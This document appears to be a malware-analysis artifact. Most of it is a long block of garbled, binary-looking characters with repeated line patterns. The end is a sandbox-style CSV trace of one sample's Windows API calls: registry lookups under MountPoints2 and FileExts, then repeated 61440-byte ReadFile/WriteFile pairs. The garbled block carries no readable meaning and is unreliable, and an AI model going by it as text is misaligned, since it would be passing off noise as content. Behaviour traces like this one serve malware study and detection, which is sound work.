JK*$:5&& O
cess'kq
F~_cUDw]
lxg@WB~_r@EUCc^eGPZU
FkRVxH
iI[sHq
5</&6* VIO
gu}a`c;
\@bDRiI[Cp6!1,6
*bHR%h
]r^MWaUPZG
OCqyauucq
WaEUBHd
NYG+6"ONG!
<'6QxMu^K
]@fV]GPwO]S
FkRPS~
ceaog!6EEQV^[JjK>
^{UIuIf
6(16PcDr
DUCd_b
3Biwinu
zp|ozpq}p`u
@RgGRiI[O
]e1V@A
rPXT@NC5fu'|db
WYCDBH
$vCu!<7&hmj
!(JyUH
N\tU^EGbC
C`0rz'gj
@@MD[p
KKk~ec|
~xgu}x}sc`}/uu
j<am'tmtF
Ee![W@C
W[Y\]IAGGA
j7pwq0f
nEXC]N_
C\WPBDBN
kKWyCGBiQKuZ{
eb'''cj@
@QzRJI
v?>x}zx-l(pz*}wq
QXG[lgrm~6
<G~sQFU\
fBYCTt\UK
qyawwcq
QAmV6A
^GS[CV^[@
Gal!ztd`F
UR@MD_F2X[DRv
/lK^UB@CMT]
eGPZUtZNI
cwoa'ge
eV5FP@TO\SP
\UQZQXPM
Afb&%u`jG
[yr'mfx~!#-9~w'q~
OCN\qCR{GU
L6>:'1?%qIV'
EBzG\{T@uAf
ws|u{bw
~|!==|v!rxk.tt-/~v
GBV`UBQEM
tlfWWuIn
cetrwfj
TTRT	@
Agf%"qaj
	p(${sacbbgbv-04,!V^[N\q'
oEA!:0,#'
uELFCU
DfUBCY
nbkFWBaXDQ
GKKEDB[
w~gqyaaiq;iI[
Di		{_$> 
&;":*ReL
aibmutmcUCDB
FJNBC]
nYQTnE@
2V^[qya
WIPI.V[DWuHg
,?6lMOG
U@oP\ER
kJQXGYbQPXK
]YYFih
VX/\NtOoAM
qtyVW]aXBMXDYX_
GKm#0-
c_%.hg
">/-&,kCO
]IcLS{UN
fVHDORPI~y[SPCQ
UTCV"[
alz"v6b
_S*XZT
 [~NMYD
KBKPhmKADC@
bUP`GPKWfY_WIgLe
q7wur77@
\(PNHX
V[_G_[GFUO
\\5Z@\3GX
@jdtp!a0
GTGPIE
^_aqubj
E\,RYQN
BP\5SM
j7wzqb1@MD
Z@vK@G<
^J1C~om
 fIQ:'&'
Fwu~uby'opic,ihs
xz|if}
sv}mxxmxq}g
^@qY@)QO
RFQ?x^
Fe5P_S\
UK@GGKCVIO@
Afb&%u`jG
|P&@CTDl
oE[CEKI
bRVc@\\InRNYGqJg
1aut!71
P]7VBCT]3
KU^XCDEH
|UU|RIL
WIgTu@
q%-.ek'
[zr'`n{|'s/k~'"|{w|C
G]I1A[
NVCRd.
A^ME_VVpa=(T57
/XGUaD\B@gQ\BTwMn
`woaqac
G^I4X]BV*S
X2Q@OP
V5PZ	gVAC
KKW[@V^[
pIE-DSY/
%t~)3bv
]|x#8k~vz 
:|x!|pzt@NC
]2MJVAQBGpo
,GtOZe
clrsudb
SNIZ*{|;lx{ t{:+qpq,||@
C\>yPWC
Gj3PYUXO
=aYPDU^VzG
VYRphmmBU_rU@tHg
flmsw`q
]}| ?o
v&su=tpt{-|&
DaL[*V
`f#0$:~_
C\WPBDBN
kKWiFG^[bS\WIg
F77sz'`g
JIrWDX
!(PWWXJDKH
cWRh[U@JtMNAWuZ{
pv-(7b|@
AILBQWGxM1
G@IgX\LTuH`
j{s{vq
PIE]ADPU
#sp.lcr
o_^YOYO4
#Gc@90 7g^Y
|yu{sn-ww{;)#sq+}q
MB~eUDW\
kcNWCHJD\\
r@PXZUtZNIu
qya!qedFH@
oV]B]&
&0,!6FmAAIQ
f[>hpu*ysobuq 
^@gX\LT~QZT
}\YNVPoCWZUrMV
PVPV[	XQV
ceaog!6EEQD
bTViWIP
quqJgG
YBUTqS
>? lzf
cTWBrXSQT`QCY
cerruq
\U~Q]UI
q)7&c`})6
-:'7GHc
=/7(37$
C5*=*4=
><-;2QQIW@BTWDoTBC^^\
FJNBC]
nYQTnE@
2V^[qya
WIPI.VZ
,?6lMOG
':ljaVt||
\IgQ\BT|TTK
wGZKWW`CXJ@9<
VTS		[
GMFH@NC4VQ+IR_|]
cwoa6*=ADP_
YJQDY^]A
Hs=? !
\@cER/Q[
FQblVns~t
OCQULUXBMBK
woau+c
iI[AN~
aztS\D\~X\U
k^SQNIF
S[SVUW
aDUQVIo
XL^E\\
/fRtY]\~X\U
	r~wzodc
S[SVUW
GBiSIuZ{
^G4<077*q
Di6,n}
;q|o}qr{*li
Di		~K*
,'8(,3&
~^oVG@
DUWK_V
%[zC? &
qe;succ
0{uio|
&ynso-3
("0GbC
Dy}C@UmtYZC_CXWFiza}
A3GKsCUB[zC
#GBiGUg
me;succ
\@fPYMGbC
.HGaQ/
 /: mNKnm}pzxp
^Ej[RyV[
g]VV[C
% k`wdu
". ~mnCE`
z~|wo~|amnk
qadk,q
We/PRE\
%uz*4fw
TIN!GjERW^z\I|Ig
a`zmu``
+~r<9||z$~f/xr
VD^QL?"ma
WP\\BICCT_
sJVCXGr[\G{
eb'''cj@
YBUTqRT]Q_
qrqywt
]BfLL{VJ
q[TDUMP
UJ>pxg*q
@14%ps7j
OCJjKZU
ZBUWYCD
0"'hme
f{vj}`mws|}ac!|
`AV(PNHXc\_
`3"wwjjC
LxE]@IP=
bNS[~VOgu]
blsztcc
	,/'if.|wu/jz$%xzw 
X2[TMN
T\UKCA@VIO
j7pwq0f
BT^YJEBI
CVLgGMwHu
@gct'!1c
Zz(qj9-{qxu>~$rq+z|
5FT/\N
V[CDUloEA
/]P[DT
bgvzkck
@jdtp!a0
LX{}!`h}x{"-}acuxyli
	9oEA!:0,#'
/bd[\T
LbWYPUPcD MBR
D3QUvI
].T@'Ln
@14%ps7j
TM<.({sn
(/-kbgqya/5
LLU$s\QCCU
W{IMTCdXf@\MK
LgGOuHu
D:9&0< 'GA
ZbUQTvX
ii{}`m+
%3(l}x1~u
KJjvz~
DdK@GEuU
1Bi ,3!ohSGFZYL/
~K@G /
DMBGTG_McVp
HUpWCK^G
%vzq1|t:4ur}G?3@
@glwr'12D
M^[LbW;
7*/PEV6x}upf`
`A\AIQG{t
!MXGAX
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
s_AK%K@G+6"ONG!
<'6QxMpIC
]{NXG@YLjLK^U
(VA"P[TyY
lqWXM4
fKYMTvY[T
\CxU&K
GKCVIO@
IDcfz&wj1
O_5vb1iva~
VP]UCNBFPT
aGMFr[\G
@gct'!1c
BRV[FM\I
~GS}@GBi
MsO3FN
#zxa1p
x!k<x|% xmtx"{,
PI~{YSPCQ	
cdzs|bc
DVJ1]n
IDbV^*B\
54wq|j2
])ii{i|
amn9$-&;0=1GA
A[qCD'""1 
KOPM_M
_|@TLUA|Dn[@WCvCp
wvq/4pi
HM181<2nca
SB_C_WEluEL
tAUZDDYX_
zIZYV]Qp@
GMFf__NxJ
kUXUvY[T
\CxU&K
9;@PQW
HF0U^-CQZ(PN 
Gtx+udevF
_{.t`=xvwp.=,'p~-wr
qY@}UI
*+7<U_
W`E^QG^mRpIVIQ6[aE
N@23pu!jd
XKF@NqXIawcb
UK-UvM
PD1	bVX
2f&r|1g
RjKZU~CAGKW09]%#=5(~@Q6
fIQ:'&'
,>,nab=qt
vt~g~k-
"?+17mkH[FUBm_nCYDR
@DERUAM
oPSQDGjK
;G_[ !&.g
qpICT>Y\U
cmaog?#dENGbC
l(y`ul\BS
!H_#hpsc}wopHKf
~uwtbytnegpzu
PSVQT	
uDYDGjK
NIQ*&7&(q
Zcessubb
~E]RUC~^`UV	
hqwYEgjur
UEq\]YKVFmAWWCQ
%qxr6-!ok'rp
@MD`c'zrbd
UCICDT_A
mJ`*!&0
^w]Nh'
W`ETQG^mRpIVIQ6[dR
7ltrrk0C
Dn['00
X\UyP_P
PIFwSSG_QKW+ =<!=&2pic
Pd~GtY]\
cetrwfj
\Bc\3@
Fa6wp#2g
jqevcg>,/K18'VIOF[f2
ko}pic,ddfG
^}FONGF}V`UV
e1zttdkAM
S0$wxm
UTqSST
 3-nae`|ew
yyq{sn+4
"/7:&"
MHGANc
WyWsEVQT@fPTU
-EM FRR
F\,AG$
RT\K2Z
G_pSDEPBG
eQE}W	
c-ssucc
!(JyUH
N\tU^EGbC
	6!%t{4VFG
E\$]UQf@NC5fu'|db
V|M:;7
$=2EIP
TDtUCYBGHc
VA#_Q"1'!
zPU^}Q
tUFYSUxMNeLFB^U
vq~}gg|
JpWFKOGO
qEX3DLD
Q\q\\_WsZ
CJuHUtYNI
VNLfN]SPMYV_dIGT
gd!!$5`
[Q~BGBi
2dEN6x}
\A#VF^G
k"0:\\_QP@Y^CdI@U
V\`B_DQU	
XvY\TO
\@cESz][
mkH[FUBm_kTQT
PSVQT	
OCpIEy@ULgG
2QUQ'0.aiq
PEVU>Y\U
a0aog;
ZXvY\U
\@cDP{GU
	[mkH[FUBm_nCYDR
A3GKmFU^iI[#
;G_[ !&.g
qpICT>Y\U
1gaog;
ZXvY\U
\@cDSsGU
9>+!.4VrIFTGd^
gBKXG4
QXP*woa
64m\GLgG
c-ssucc
^~E]SWDmJ`
azqGRz\I
y^GC]VjKBBVP
S[SVUW
q'&$, 'PU
\EUuHf
 ?'G^mDn[
!(NBfPUE\
|W^B[PqIPBWB
3K^ER~
ceaog!6EEQV^[JjK>
^{UIuIe
980 PcD`UV
!(NBcD[{\H
~_BGVMcQATIPl
cwoa764K_VPU
{UIuHf
 ?'G^mDn[
!(NBcD[{\H
{^QTU}UFEG^
q'&$, 'PU
aeaog=
VrIDTAbM{P
UAcEUzWL
yZCPCAgWBTIPQ
GMQ\@NC4VW
OCqyauucq
WaEUBHgYNYG+6"ONG!
<'6QxMpIC
\@aP^@\`QYV
3K^ER~
ceaog!6EEQV^[JjK>
^{UIuIe
980 PcD`UV
!(NBcD[{\H
~_BGVMxU]F@GF
cwoa764K_VPU
{UIuHf
 ?'G^mDn[
!(NBcD[{\H
~_BGVMxU]F@GFj
FnEXC]%
cwoa764K_VPU
{UIuHf
 ?'G^mDn[
/fRaESrU@
|XRSYjKBBVP
S[SVUW
q'&$, 'PU
wyk`w<
WA@G^m
N}YWP{T@
}_SV]aPKXUF
@DERUAM
{P_DUdEN
GKK !1:g
qpIEm\G
cesstac
^6E]RUB~Tt[XG
^@bLRrTI
	r~fpjlO
j4p&tj1
N@	 ZZ
{_ZDQqHu/&
tqxuekt
XRHXqCI,v
j7wzqb1@MD
FQqX[]N_
edwwuq^(
	&*cz}9I	R	
QX^PJWCMVO
HF1ez!vggA
KU^XCDEH
|US|RIL
WIgTu@
d1'!uj1
u(j~ukCSQ
VYAUCICY&]
gBYDUvY\U
.wNIgac
2f&r|1g
LzG]@IP-RtN
dV0VUPN
N@23pu!jd
ZVY\UCHABGA
v;'&"!:=EaMFINJKcNW
W}WA@Q@
JCfW^v
N@23pu!jd
^J-&gu}
,?:pcm
%?,ibKH
^cE]RU_
VrIYUCd_bUQT
TPQUU	V
QXG?GKm'
qe;succ
x3uiosecc}lx};
0?@IP#
YIWCQh}KnxMA_WMlnX^TXFAiz[BFVLXtQ@CKCL>qNG
UK>~[A
^GJWnz2zma\
54wq|j2
X~EONG
*][XzQMuZZ(
cdzs|bc
cF[.W@O
VP]UCNBFPT
aGMFr[\G
@gct'!1c
BRV[FM\I
~GScEG^[4UZB
ga vr65
G]I4UUAT,
#\YTEY
_YUTCIDEWX
nAKXGr[\G
@gct'!1c
BUPXAAKW
pIE{BULgG
qN`FH@cl!pqg0
FZ(QJK_|y|`>p)pj1qjkc--5D
fDYFGpQ
^_aqubj
j4p&tj1
x{gu}%%-6 < +7"mx
 JINNIZ4
DU^CY^\C~WD
HG`[e_QDQH
USV^PWF
JKZUC[_V
E}W6':
$?&GiZu
</&hmcZ
^6E]RUB~Tt[XG
USV^PWF
JKZUC[_V
dEN!G@G'0
\@vY]W~CAGCp6W>&=
MZxKFU
QUQBU]
-t).-+4
!l*-6]1
7GMFANxTCrYNhDC_U
@DERUAM
{P_DUdEN
K@G ,07 >q
cesstac
^6E]RUB~
lAxiI]_mXT]XDYX_SYe
W]GKKL[@U
U]#PWQ
[!u}|7{z=ktvwF?i
alz"v6b
qXIawcb
UK-UvM
PD1	bVX
2f&r|1g
/[XG0&
cwNIgac
N\d]^UlMO
," pea
@`[1PV
USZSX@
1azwt11CJ
TM7_1AYA<
m":'KKLM^GJjK
BUTqSRWCQ
80G~^MeBXMU
FKRV^K
ii{}`m+
%3(l}x1~u
]AkWNi
KJjf]ZTMzy~qECKUWEfUEB[ZWr`[_KOKQAlgTR
04aogec
@T\{GUg
*'G_v_/BYDU
yru`nseecw{mqegvp
^@qY@)QO
RFQ?x^
Fe5P_S\
@j!AG]XJ
_X\UDHAA\C
pICPtYNI
eb'''cj@
BUPXAAKW
pIEeGUPUt
@uu}/`e D
gKXDUqX^P
jfaogga
TSRA+T!MG
^GS[CV^[@
6gz!|bd
*)$?lu1ketyl<4qip
*+7<U_~aYP
_^luHA]WPIP2
USV^PWF
^GQYCV^[DEN7
K@Gqya
EEQBBI
&GUg*2CHd:9&aiq
woau+c
x{uinrmp~g 
*81  mJ`
LZ~Q_BFUPhVo[SCVCVWDl`X\QVYChpW^PQ\DtIP
AQF?f_
2f&r|1g
^_aqubj
E\,RYQN
PY\C2GXV_^WQpH
/bd[\T
LbWYPUPcD MBR
JCfW^v
N@23pu!jd
^J-&gu}
=30qipqya/5
LLU$}YSB_B]VVpu
q{JFTM
oPn}^L^Ma_YYEA
em`votCNA_U
PTT~W 
q'&$, 'PU
qF[k_;_^DB_] [FI
V,ZsXWW
VpEW_UK
Z}EVnW
BUWYQyx[
kU^`EUEHdTU[UpKu
aeaog1g
@P[_@okD
^GS[CV^[@
xQM&M`GJ
`l&q|1j
|z';>%fd6|yehm0$p
\@qY@-
uEL7:40
fUBCY^
WXMY^__BR
WUhGG[BGHc
I\w|,vf} je 't
EEu|,|c~p;e1}g#C98
IDbV^*B\
54wq|j2
bxrr b~
]xMQUBJy}
]JpKGjKXW
BUVYCDPU
qXIawcb
gd!!$5`
KV^[LbW?
6,8pIC7x}utgg
{ii{kqep~g,`ib7!0
XCRo)[
J^^Yd&
R@MDUB~aM
aerzujb
QQF,Su
WzRJ!J4
D2aqz|2`G
_zRAN_
k0wrhbbG
QkQ\SI
\~DTR\C
VuHFPJz_gVCH
VTS		[
GMFH@NC4VQ5LRCNn
q3*/  *QXGO
bgwaiq?RzCNYG&'
UBQDY^
\~DTR\C
VuHFPJz_bAKXG
PVPV[	XQV
ceaog5:NIQI
7(&xjsb
UPRUT]
!(NBy_{E_WUB
LeL APQ
VY\]QUQ
/[XG!7
c-srwc5
^~E]@hxmTrHMUJe_bRPV
GeMu_^V^M
K@G ,07 >q
me;succ
B_\s_U
Z^~C	RUA{Dn[
^p_rEQWWGjGJ\
VIQdUDW^L
G^N2%3&!~m
XvY\G 4
[w[]WVPcDvKDG_v
Fjbrt}02
VX^QQUQ
Hx50K~aM&;7
*:=VaCLME
4K@GIIt
CYBUTp
WG_QCp4967;
<'G~^MeBXMU
F_^]RK
(91b{h=s
_wETSUBxWpLMKCa\pICP
pqynyp#K@GQUQ
TEA2_WD
gwoa!$
MoMLXP
Y[C,_gFP
DTUCjYCT
^@mYV APQ
QTQQUQ
cessucc
UJ6\fQ
jar!'25
VY\TAMQXG	UeM
me;sue7
LErEQWWG
G^NW@@GH
UCICDU]
/XGSTwP\\
ddqv|}c
ZvK@GO
}_ @ER@0]1QR
7g wv52
N@	-VOI
zra<"w~ps~d}yq#;NIQ
iI[zL:
Gpo:61,6<5VpuKBF
^DfUBB
PVPV[	XQV
]qX[]AM
cUDfQ]
]gTuLbW>7&1
[XGQxM:.
\IgQ\BT|TTK
qC_Gw^QQ_
df'q&g`DM
@IPyVr[XG
RhdiWItAg
cbrqpj}
q:jt04bvw1ml1|c
U_~uEBPIL
9(Z\N=
LXr<<-76a
a|a~zM
[w[]WVPcDvKDG_v
Fjbrt}02
YDUvY]W
WwXURS
yWuKB\E2
EEQBBI
6FjK?0aog
+b z&cc
"W`hG@
W{IMTCdXf@\MK
(VVU{Q
w%*)6 [_VU
7UQTvK@GN\d:9&
\{LCRPAmJ`MFUQxM0QWSIZT
7T^-D\Zz
ddt{&2q
USD_BHA9(
QsKA\]dZdPEVQ
pqynyp#K@GQUQ
QTvY\T
\{LCRPAmJ`MFUQxM0QWSIZT
7T^-D\Zz
ddt{&2q
VY]WE[_V
DUvY\T
\{LCRPAmJ`MFUQxM5F_C
vx{m1$
DR-8<*+)"amn
B_C_VE>oKBF
=4BR_R]QC~HrR^_C\B
OCDENSCIQXG
<=+0~{d
j^VD@P@PecYZAM_MRFluEL
PTDo!J
7g wv52
/WA@SB
dTSeEG
stS\D\uAf
ws|u{b|
9;@PQW
GBR	FN
Z@Q%\[
j0qz'jb
}C	[RCx^!
VIQb_gPEV
HY_B@FI
!(pWW~IUWzUIrIe
clpaiqg
[.{v`:ql0ktyg;g0qaDM
Vj)PTCXK
Vpu_^TM[Q:*
PIPqXIawcb
UK-UvM
PD1	bVX
2f&r|1g
qXIawcb
UK-UvM
PD1	gAP
6dz!qjg
CXGqXIawcb
UK-UvM
PD1	bVX
Gbl!w|gb@NCD
#CAGzL:
CXGqXIawcb
UK-UvM
PD1	gAP
 z)dk'
N@	-VOI
zra<-moczo}coj/')G_[
@gG+H_7)
* 7< MJV~{K
BU^DfT
OCPIE_CDPU
&GUg/%KXG
qqyas=cc
Fx{uior6fpil:
 >'7PcD.	'
KJAPFQlodiP]C^_DefY^S^EFemEKAGBVbWBQEM
JCfWX]'Z	T
jar!'25
wu}|w_O
YE\!WJ	M^G|
alz"v6b
#DRSf]@Xr
eE@UBJg
cbrqpj}
XBuZEQ
9'egv j|!
JCXBw\
]\,UTQ
\![:rc0vrir{M#cx
_YUTCIDEWX
gVCHd]^U
1aut!71
YP\K.U'HM
QX^PJWCMVO
1fww&fdGJ
zXhxAE
%G_KDUTcOA
HM>6: ?ko}
7(0GKcNW
clrsudb
WJ6VfEZ
G4UR]#[U
`1q q`5C
phkFtY]\
cetrwfj
\Bc\6W
QG\#[U
7g wv52
\yPZ]N_a
~wedm~w(G%+5[_V
]lYOVWBmJ`
gd!!$5`
VY]WC[_V
0"'hma
LzG]@IP-RtN
dV0VUPN
JCw@\X
17"%ve7
@`aw pd6D
RFpG~cPWTpZS\BC
	vw{||yzlpicp
w%*)6 [_VGA
LJU>Y\Ug
@0woa+
&ONGB7VrIDUBeWpIC
]x^]GCkOW
epedxcg{
FCvUQEP
\tqz&g~&9bvx!
1azwt11CJ
mbraHYq
UCdENQ|QOI
GVN&\B^A
~$} cp!kkqp&B
Fts*|extg43kxg
WP\\BICCT_
gGZVId]^U
1aut!71
YP\K.U'HM
\WXV\I
zKFFEC@c
1fww&fdGJ
A@[USd@VZ
\qX[]N_jINF}U
G_QzLY
X\9\\_SQE
VrHDUCvCu
G_[EDUO
qwoa)#
K@GlMO
kW/_q]E
[__lQUVYVEM
vbXGST
gTuu^K'0
qe;succ
x3uio|
rp|}ac-
<#'G^m
YIWCQh}KnxMA_WMlnX^TXFAiz[BGVLXtQ@CKCL>qNG
UK>fGQ
jl"p bj@
;[XG!1
ThW]AQuZZ(
cdzs|bc
_AQ-TZ
Agf%"qaj
rPXTO\Q
BlC]RG^m
J}DTU@UihsgJg
jdssrba
I\xr'jkx,vv)9}rz-{w'
	UB8n^_SW
~oWDBULXt
jM?1&16q^(
@`[1PV
USZSX@
7U^L\$K2
@glwr'12D
: 6(6=V_
\@tPEQ
CYEmuX\
XyG@Cm}_ZD]UYEA
SWwCXC
FkRPS~
ceaog!6EEQV^[JjK>
^{UIuIe
6(16PcDr
DUCd_c
EAgkorlbkt~dhdapk
Ue/ZWF
[KQC>/
]B4V^_CKQ=a|ajf_NYO
KaoQKCE\]
#MF\J5\2CP
BPTK_VFK
)U@'Kc
d0%svj6
FUGbBZ(
OFPP^HK
bbqu|e5_p
LzG]@IP-RtN
dV0VUPN
N@23pu!jd
ZVY\UCH
e6;&1$':MB
LzG]@IP-RtN
dV5A]@
ddt{&2q
Ix*V9AYA8:,
$77KXKMBC
FQYmUPTKycM\Q]e
^XDYP_]G\
gBKXG 
QUQ'0.aiq
PICVId
c-ssucc
mWASIbe~V\]eST^^YC^@
HUpWCK^G
%vzq1|t:4ur}G?3@
1azwt11CJ
pIC7x}utgg
Z|EONG
JCc@PM
gd!!$5`
VY]TC[_V
18u^K'0n}sbg
]BsPBU{ROI
TPQUU	V
HUrUCK^G
Y[*gbg
!(qgsr|cj
CgV7WX
\PCV"[
alz"v6b
NIlW]U
9	N@~4
KF@Nqya'2
6QEPGHc
w=~ubysncuch
cDW_RTK
_sIDRBfZn\YMV
FzETVL
w%*)6 [_VU
%K@GN\d:9&
lS]_^XF_P
wgCOp{snkuxu
vw{||yvlu~k`w
w1&": V^[
{UIuHf
0>1G^mV:IDUCd^4
KXGEuSH
xiHS}qeckuweoedt`
\E`WNiQK
SC91Y]]
EJ>zDEA
]]We$K
WP\\BICCT_
b\RFjKXW
q7wur77@
CWRP]DGJ
fWWsYG
0`t&#c`
VP]UCNBFPT
dPEVQtYNI
eb'''cj@
CUW^BFG@
aGKaFWQVIi
MsO3FN
j7pwq0f
zr|8l&dk0qw`n71$4
FUGbBZ(
e_VV[C
9aYP!0-7
6!QEMLpg
HLl+XU\\
w]\FIP
lxg@WB~_r@EUCc^`PXJ
tMNCUuZ{
JK?00:6'6O
cesr&0q
FtUC[D^A
HL~Dn[
6_W7_qzYRAYULyy
c\EDYYVAiSO^PGVIF[WlfIQ	@YGFH@S[&R@UN
b7!"#`eF
BUWXADPU
M~G21n}sbg
}xgu}wgbpil6kcd!6@
FJ>wLFC
NCPSBloCW
cdzs|bc
DVJ1]n
IDbV^*B\
54wq|j2
OADEN	
6arntb6
QsKA\]dVaGMF
PVPV[	XQV
w%*)6 [_VGA
DJU>Y\U
7eaog?#tMNWIl	+
BQDY__
QsKA\]dVdPEVQ
RZ%U[^T}
.Z^5PCA6&0
^j_*UQU
i}q[JT
_BqY_MOC@[_Lx[
7g wv52
/WA@SB
lSVwFUCyoiWItAg
cbrqpj}
q:j{*%q
f(sz*p
M[QjsEP^G
M@FG^QJKcNW
^}WA@Q@
C@4UUAT'
7ltrrk0C
XiI[KW\
CICDU\A
lMO6x}
[w[\RVPcDvKDG_v
ddt{&2q
6 *amn
+_VDGQCWloEA
CJ`TFGYMcVgJ@]VB\Clc_T^Y
h_YWG^Q
S[SVUW
VId_\U
!0$*6'![
beaog=
WA@G^m
\R[kNGU
sX\_ZW
tP@IXMD
HU6MFRIZS
AVHXs	e!]Z
ZWF2QFMP
OCANfWDQ
^KaoQKCE\]
bRPVsPBT
7ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001c0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001cc","hKey->0x000001c0","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001cc","lpValueName->Generation"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001cc","hKey->0x0000011c","lpSubKey->FileExts"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x000001cc","lpSubKey->."
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x000001cc","lpSubKey->."
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_CLASSES_ROOT","lpSubKey->."
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_CLASSES_ROOT","lpSubKey->SystemFileAssociations\."
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_CLASSES_ROOT","lpSubKey->."
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
